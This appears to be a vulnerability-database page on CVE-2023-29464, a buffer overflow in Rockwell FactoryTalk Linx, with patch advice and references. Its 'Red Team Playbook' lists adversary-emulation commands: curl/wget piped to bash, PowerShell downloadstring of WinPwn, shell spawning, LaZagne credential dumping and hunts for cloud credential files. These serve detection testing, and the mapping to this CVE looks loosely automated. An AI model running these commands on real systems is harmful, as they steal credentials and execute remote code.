CVE-2023-29464
Overview
This vulnerability is a buffer overflow caused by improper validation of packet size in the FactoryTalk Linx component of Rockwell Automation PanelView Plus. The root cause lies in the handling of crafted malicious packets that exceed the allocated buffer size, leading to memory corruption. The flaw specifically affects the communication processing over the Common Industrial Protocol (CIP) within FactoryTalk Linx versions 6.20 and 6.30.
Vulnerability Description
FactoryTalk Linx, in the Rockwell Automation PanelView Plus, allows an unauthenticated threat actor to read data from memory via crafted malicious packets. Sending a size larger than the buffer size results in leakage of data from memory resulting in an information disclosure. If the size is large enough, it causes communications over the common industrial protocol to become unresponsive to any type of packet, resulting in a denial-of-service to FactoryTalk Linx over the common industrial protocol.
Impact
An unauthenticated attacker with network access can exploit this vulnerability to read sensitive memory contents, leading to information disclosure. Furthermore, by sending oversized packets, the attacker can cause a denial-of-service condition by making FactoryTalk Linx unresponsive to CIP communications. This disrupts industrial control operations relying on FactoryTalk Linx. The attack requires no privileges or user interaction, as indicated by the CVSS vector (AV:N/AC:L/PR:N/UI:N), enabling remote exploitation over the network.
Solution
Rockwell Automation recommends updating FactoryTalk Linx to patched versions that address this vulnerability, specifically versions later than 6.30 where the issue is resolved. Detailed remediation steps and patch availability are documented in the vendor advisory at https://rockwellautomation.custhelp.com/app/answers/answer_view/a_id/1141040. Users should apply these updates promptly to mitigate the vulnerability. No alternative workarounds are specified in the advisory.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in FactoryTalk Linx, utilized within Rockwell Automation's PanelView Plus, presents a significant security concern due to its ability to allow unauthenticated actors to exploit memory management flaws. Specifically, the issue arises when crafted malicious packets are sent with a size exceeding the designated buffer capacity. This results in unintended data leakage from memory, which can expose sensitive information. Furthermore, if the packet size is sufficiently large, it can disrupt communication over the common industrial protocol, leading to a denial-of-service condition. This dual threat of information disclosure and service disruption underscores the critical nature of the vulnerability.
Attack vectors for this vulnerability are particularly concerning given the ease with which an adversary could exploit the flaw. An attacker could leverage network access to send specially crafted packets to the affected systems without requiring authentication. This means that even individuals with minimal technical expertise could potentially launch an attack, making it a low-barrier entry point for malicious actors. Exploitation scenarios could include targeted attacks on manufacturing environments, where operational integrity is paramount. For instance, an attacker could manipulate data flows or cause system outages, leading to significant operational disruptions and financial losses.
The real-world impact of this vulnerability extends beyond immediate technical concerns; it poses substantial business risks as well. Organizations relying on FactoryTalk Linx for critical operations may face severe consequences if their systems become unresponsive or if sensitive data is leaked. The potential for operational downtime can lead to production delays, loss of revenue, and damage to reputation. Furthermore, the exposure of proprietary or sensitive information could result in compliance violations, legal ramifications, and loss of customer trust. The high CVSS score of 9.1 reflects the severity of these risks, indicating that organizations must prioritize addressing this vulnerability.
Detection and mitigation strategies are essential to safeguard against the exploitation of this vulnerability. Organizations should implement robust network monitoring solutions to detect anomalous packet sizes and patterns indicative of an attack. Regular vulnerability assessments and penetration testing can help identify weaknesses in the system before they can be exploited. Additionally, applying patches and updates provided by Rockwell Automation is crucial to closing the security gaps associated with this vulnerability. Employing network segmentation can also limit the exposure of critical systems to potential threats, thereby reducing the attack surface.
In conclusion, the vulnerability in FactoryTalk Linx represents a critical risk to organizations utilizing Rockwell Automation's PanelView Plus. The potential for unauthorized data access and service disruption necessitates immediate attention from cybersecurity professionals. By understanding the technical details, recognizing the attack vectors, assessing the real-world impacts, and implementing effective detection and mitigation strategies, organizations can better protect themselves against this significant threat. As the landscape of industrial control systems continues to evolve, proactive measures are essential to ensure the integrity and security of operational environments.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Rockwellautomation | Factorytalk Linx | 6.20 |
cpe:2.3:a:rockwellautomation:factorytalk_linx:6.20:*:*:*:*:*:*:*
|
|
|
Rockwellautomation | Factorytalk Linx | 6.30 |
cpe:2.3:a:rockwellautomation:factorytalk_linx:6.30:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-29464 |
| rockwellautomation.custhelp.com |
GitHub CVE
|
https://rockwellautomation.custhelp.com/app/answers/answer_view/a_id/1141040 |